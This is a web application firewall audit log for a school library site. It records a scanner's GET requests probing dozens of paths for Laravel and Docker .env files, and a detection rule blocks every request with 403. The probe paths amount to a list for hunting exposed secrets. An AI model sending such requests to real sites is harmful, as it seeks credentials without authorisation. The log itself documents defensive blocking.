Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2631e443-Z-- --aa038b31-A-- [06/Jun/2025:05:49:57 +0700] aEIfFWaFzeU7VUj_TDFzzwAAABQ 103.236.140.4 48130 103.236.140.4 8181 --aa038b31-B-- GET /cron/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236160 --aa038b31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --aa038b31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163797055512 686 (- - -) Stopwatch2: 1749163797055512 686; combined=257, p1=220, p2=0, p3=0, p4=0, p5=37, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa038b31-Z-- --bc7d3255-A-- [06/Jun/2025:05:49:57 +0700] aEIfFeJsrKcXA4Tjex0GigAAAEY 103.236.140.4 48134 103.236.140.4 8181 --bc7d3255-B-- GET /www/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412775 --bc7d3255-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bc7d3255-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163797236221 743 (- - -) Stopwatch2: 1749163797236221 743; combined=306, p1=274, p2=0, p3=0, p4=0, p5=32, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc7d3255-Z-- --e61be171-A-- [06/Jun/2025:05:49:57 +0700] aEIfFfHwHPygw9BuFzQ1vAAAAIA 103.236.140.4 48138 103.236.140.4 8181 --e61be171-B-- GET /docker/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236163 --e61be171-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e61be171-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163797417046 706 (- - -) Stopwatch2: 1749163797417046 706; combined=281, p1=246, p2=0, p3=0, p4=0, p5=35, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e61be171-Z-- --c7c1c66f-A-- [06/Jun/2025:05:49:57 +0700] aEIfFfHwHPygw9BuFzQ1vQAAAIM 103.236.140.4 48142 103.236.140.4 8181 --c7c1c66f-B-- GET /docker/app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412778 --c7c1c66f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c7c1c66f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163797597864 695 (- - -) Stopwatch2: 1749163797597864 695; combined=278, p1=218, p2=0, p3=0, p4=0, p5=60, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7c1c66f-Z-- --7e1aee27-A-- [06/Jun/2025:05:49:57 +0700] aEIfFdKrQJH3faNNWWAW-wAAANI 103.236.140.4 48146 103.236.140.4 8181 --7e1aee27-B-- GET /env.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236166 --7e1aee27-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7e1aee27-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749163797778573 1955 (- - -) Stopwatch2: 1749163797778573 1955; combined=677, p1=315, p2=327, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e1aee27-Z-- --a6695d0e-A-- [06/Jun/2025:05:49:58 +0700] aEIfFtKrQJH3faNNWWAXAAAAANc 103.236.140.4 48146 103.236.140.4 8181 --a6695d0e-B-- GET /.vscode/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412787 --a6695d0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a6695d0e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163798693752 574 (- - -) Stopwatch2: 1749163798693752 574; combined=212, p1=189, p2=0, p3=0, p4=0, p5=23, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6695d0e-Z-- --2c591267-A-- [06/Jun/2025:05:49:58 +0700] aEIfFtKrQJH3faNNWWAXAQAAAMA 103.236.140.4 48160 103.236.140.4 8181 --2c591267-B-- GET /js/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236175 --2c591267-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2c591267-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163798874660 856 (- - -) Stopwatch2: 1749163798874660 856; combined=294, p1=261, p2=0, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c591267-Z-- --a90ee13e-A-- [06/Jun/2025:05:49:59 +0700] aEIfF9KrQJH3faNNWWAXAgAAAMM 103.236.140.4 48164 103.236.140.4 8181 --a90ee13e-B-- GET /laravel/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412790 --a90ee13e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a90ee13e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163799055527 643 (- - -) Stopwatch2: 1749163799055527 643; combined=247, p1=221, p2=0, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a90ee13e-Z-- --11c83775-A-- [06/Jun/2025:05:49:59 +0700] aEIfF9KrQJH3faNNWWAXAwAAAMI 103.236.140.4 48168 103.236.140.4 8181 --11c83775-B-- GET /laravel/core/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236178 --11c83775-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --11c83775-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163799236195 657 (- - -) Stopwatch2: 1749163799236195 657; combined=262, p1=236, p2=0, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11c83775-Z-- --2bfd4233-A-- [06/Jun/2025:05:49:59 +0700] aEIfF9KrQJH3faNNWWAXBAAAAMY 103.236.140.4 48172 103.236.140.4 8181 --2bfd4233-B-- GET /mail/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412793 --2bfd4233-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2bfd4233-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163799416818 654 (- - -) Stopwatch2: 1749163799416818 654; combined=244, p1=218, p2=0, p3=0, p4=0, p5=26, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bfd4233-Z-- --ee100a51-A-- [06/Jun/2025:05:49:59 +0700] aEIfF9KrQJH3faNNWWAXBQAAAMc 103.236.140.4 48176 103.236.140.4 8181 --ee100a51-B-- GET /mailer/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236181 --ee100a51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ee100a51-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163799597509 23356 (- - -) Stopwatch2: 1749163799597509 23356; combined=45666, p1=215, p2=0, p3=0, p4=0, p5=22738, sr=64, sw=0, l=0, gc=22713 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee100a51-Z-- --0ee30271-A-- [06/Jun/2025:05:49:59 +0700] aEIfF_HwHPygw9BuFzQ1vgAAAIQ 103.236.140.4 48180 103.236.140.4 8181 --0ee30271-B-- GET /nginx/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412796 --0ee30271-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0ee30271-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163799778243 792 (- - -) Stopwatch2: 1749163799778243 792; combined=296, p1=259, p2=0, p3=0, p4=0, p5=36, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ee30271-Z-- --6b5da708-A-- [06/Jun/2025:05:49:59 +0700] aEIfF-JsrKcXA4Tjex0GiwAAAEg 103.236.140.4 48184 103.236.140.4 8181 --6b5da708-B-- GET /public/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236184 --6b5da708-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6b5da708-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163799959019 757 (- - -) Stopwatch2: 1749163799959019 757; combined=334, p1=300, p2=0, p3=0, p4=0, p5=34, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b5da708-Z-- --dda6ae77-A-- [06/Jun/2025:05:50:00 +0700] aEIfGOJsrKcXA4Tjex0GjAAAAEo 103.236.140.4 48188 103.236.140.4 8181 --dda6ae77-B-- GET /site/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412799 --dda6ae77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --dda6ae77-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163800139797 702 (- - -) Stopwatch2: 1749163800139797 702; combined=268, p1=233, p2=0, p3=0, p4=0, p5=34, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dda6ae77-Z-- --4f2c5f76-A-- [06/Jun/2025:05:50:00 +0700] aEIfGOJsrKcXA4Tjex0GjQAAAEk 103.236.140.4 48192 103.236.140.4 8181 --4f2c5f76-B-- GET /xampp/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236187 --4f2c5f76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4f2c5f76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163800320632 720 (- - -) Stopwatch2: 1749163800320632 720; combined=313, p1=280, p2=0, p3=0, p4=0, p5=32, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f2c5f76-Z-- --f73d0f05-A-- [06/Jun/2025:05:50:00 +0700] aEIfGNKrQJH3faNNWWAXBgAAAMg 103.236.140.4 48196 103.236.140.4 8181 --f73d0f05-B-- GET /.docker/laravel/app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412802 --f73d0f05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f73d0f05-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163800501403 699 (- - -) Stopwatch2: 1749163800501403 699; combined=282, p1=249, p2=0, p3=0, p4=0, p5=33, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f73d0f05-Z-- --0997e92f-A-- [06/Jun/2025:05:50:00 +0700] aEIfGNKrQJH3faNNWWAXBwAAAMw 103.236.140.4 48200 103.236.140.4 8181 --0997e92f-B-- GET /laravel/.env.local HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236190 --0997e92f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0997e92f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163800682123 690 (- - -) Stopwatch2: 1749163800682123 690; combined=294, p1=262, p2=0, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0997e92f-Z-- --65b2e310-A-- [06/Jun/2025:05:50:00 +0700] aEIfGNKrQJH3faNNWWAXCAAAAM0 103.236.140.4 48204 103.236.140.4 8181 --65b2e310-B-- GET /laravel/.env.production HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412805 --65b2e310-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --65b2e310-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163800862814 710 (- - -) Stopwatch2: 1749163800862814 710; combined=306, p1=253, p2=0, p3=0, p4=0, p5=53, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
